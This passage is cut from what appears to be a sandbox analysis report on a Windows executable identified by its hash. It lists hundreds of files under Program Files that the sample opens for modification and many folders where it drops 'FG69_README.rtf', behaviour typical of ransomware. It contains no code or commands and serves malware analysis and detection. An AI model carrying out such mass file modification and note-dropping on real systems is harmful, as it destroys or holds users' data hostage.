Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nome d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ta.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_es.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tashkent d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bg.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\mr.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Barbados d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\bin\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\v8_context_snapshot.bin d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\London d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+7 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mexico_City d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Amman d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bogota d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kiev d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\CompleteGroup.wmv d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Mail\en-US\WinMail.exe.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Juan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku 